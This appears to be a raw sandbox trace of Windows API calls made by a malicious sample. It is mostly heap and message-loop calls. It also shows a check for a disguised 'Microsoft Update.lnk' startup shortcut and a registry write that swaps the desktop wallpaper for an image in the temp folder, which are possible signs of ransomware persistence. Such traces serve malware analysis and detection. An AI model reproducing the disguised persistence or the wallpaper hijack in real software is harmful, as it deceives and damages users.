HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0246.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0246.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0246.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0246.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0246.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0246.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0246.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0246.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0246.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0246.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0246.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0246.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0246.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0246.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0246.003] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0246.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0246.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0246.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0246.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0246.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0246.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0246.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0246.149] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0246.151] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0246.151] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0246.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0246.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0246.151] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0246.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0246.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0246.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0246.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0246.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0246.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0246.153] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0246.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0246.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0246.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0246.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0246.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0246.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0246.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0246.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0246.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0246.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0246.154] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0246.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0246.154] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0246.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0246.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0246.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0246.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0246.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0246.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0246.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0246.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0246.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0246.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0246.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eadf0 | out: hHeap=0x2af0000) returned 1 [0246.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0246.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0246.155] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0246.155] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0246.155] timeGetTime () returned 0x117d6ec [0246.155] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.155] Sleep (dwMilliseconds=0xa) [0246.248] timeGetTime () returned 0x117d749 [0246.248] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.248] Sleep (dwMilliseconds=0xa) [0246.377] timeGetTime () returned 0x117d7c6 [0246.377] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.377] Sleep (dwMilliseconds=0xa) [0246.423] timeGetTime () returned 0x117d7f5 [0246.423] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.423] Sleep (dwMilliseconds=0xa) [0246.462] timeGetTime () returned 0x117d815 [0246.462] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.462] Sleep (dwMilliseconds=0xa) [0246.480] timeGetTime () returned 0x117d834 [0246.480] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.480] Sleep (dwMilliseconds=0xa) [0246.548] timeGetTime () returned 0x117d872 [0246.548] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0246.548] TranslateMessage (lpMsg=0x8cf798) returned 0 [0246.548] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0246.548] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0246.548] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0246.548] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.548] Sleep (dwMilliseconds=0xa) [0246.593] timeGetTime () returned 0x117d8a4 [0246.593] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.593] Sleep (dwMilliseconds=0xa) [0246.622] timeGetTime () returned 0x117d8c0 [0246.622] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.622] Sleep (dwMilliseconds=0xa) [0246.636] timeGetTime () returned 0x117d8d0 [0246.636] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.636] Sleep (dwMilliseconds=0xa) [0246.651] timeGetTime () returned 0x117d8e0 [0246.651] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.652] Sleep (dwMilliseconds=0xa) [0246.692] timeGetTime () returned 0x117d8ff [0246.692] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.692] Sleep (dwMilliseconds=0xa) [0246.714] timeGetTime () returned 0x117d91e [0246.714] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.714] Sleep (dwMilliseconds=0xa) [0246.741] timeGetTime () returned 0x117d92e [0246.741] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.741] Sleep (dwMilliseconds=0xa) [0246.763] timeGetTime () returned 0x117d94d [0246.763] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.763] Sleep (dwMilliseconds=0xa) [0246.781] timeGetTime () returned 0x117d95d [0246.781] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.781] Sleep (dwMilliseconds=0xa) [0246.798] timeGetTime () returned 0x117d971 [0246.798] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.798] Sleep (dwMilliseconds=0xa) [0246.823] timeGetTime () returned 0x117d98b [0246.823] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.823] Sleep (dwMilliseconds=0xa) [0246.839] timeGetTime () returned 0x117d99b [0246.839] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.839] Sleep (dwMilliseconds=0xa) [0246.854] timeGetTime () returned 0x117d9ab [0246.854] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.854] Sleep (dwMilliseconds=0xa) [0246.869] timeGetTime () returned 0x117d9ba [0246.869] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.869] Sleep (dwMilliseconds=0xa) [0246.885] timeGetTime () returned 0x117d9ca [0246.886] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.886] Sleep (dwMilliseconds=0xa) [0246.901] timeGetTime () returned 0x117d9da [0246.901] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.901] Sleep (dwMilliseconds=0xa) [0246.917] timeGetTime () returned 0x117d9e9 [0246.917] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.917] Sleep (dwMilliseconds=0xa) [0246.938] timeGetTime () returned 0x117d9f9 [0246.938] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.938] Sleep (dwMilliseconds=0xa) [0246.972] timeGetTime () returned 0x117da18 [0246.972] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.972] Sleep (dwMilliseconds=0xa) [0246.994] timeGetTime () returned 0x117da37 [0246.994] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0246.994] Sleep (dwMilliseconds=0xa) [0247.010] timeGetTime () returned 0x117da47 [0247.010] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.010] Sleep (dwMilliseconds=0xa) [0247.026] timeGetTime () returned 0x117da57 [0247.026] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.026] Sleep (dwMilliseconds=0xa) [0247.041] timeGetTime () returned 0x117da66 [0247.041] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.041] Sleep (dwMilliseconds=0xa) [0247.057] timeGetTime () returned 0x117da76 [0247.057] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.057] Sleep (dwMilliseconds=0xa) [0247.072] timeGetTime () returned 0x117da85 [0247.073] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.073] Sleep (dwMilliseconds=0xa) [0247.088] timeGetTime () returned 0x117da95 [0247.088] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.088] Sleep (dwMilliseconds=0xa) [0247.104] timeGetTime () returned 0x117daa5 [0247.104] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.104] Sleep (dwMilliseconds=0xa) [0247.120] timeGetTime () returned 0x117dab4 [0247.120] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.120] Sleep (dwMilliseconds=0xa) [0247.135] timeGetTime () returned 0x117dac4 [0247.136] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0247.136] Sleep (dwMilliseconds=0xa) [0247.150] timeGetTime () returned 0x117dad4 [0247.152] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.152] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0247.152] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0247.152] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0247.152] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x3c0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0247.153] RegSetValueExW (in: hKey=0x3c0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0247.179] RegCloseKey (hKey=0x3c0) returned 0x0 [0247.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a736f0 | out: hHeap=0x2af0000) returned 1 [0247.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0247.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0247.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0247.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0247.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0247.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0247.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0247.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0247.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0247.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0247.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0247.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0247.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0247.179] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0247.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0247.180] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0247.180] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0247.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0247.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0247.181] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0247.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0247.181] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0247.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0247.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0247.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0247.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0247.181] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0247.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0247.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0247.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0247.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0247.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0247.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0247.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0247.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0247.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0247.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0247.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0247.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0247.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0247.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4b8 [0247.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0247.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0247.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0247.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0247.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0247.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0247.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0247.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0247.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0247.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0247.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0247.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0247.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0247.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0247.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0247.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0247.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0247.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0247.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0247.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0247.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0247.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0247.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0247.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 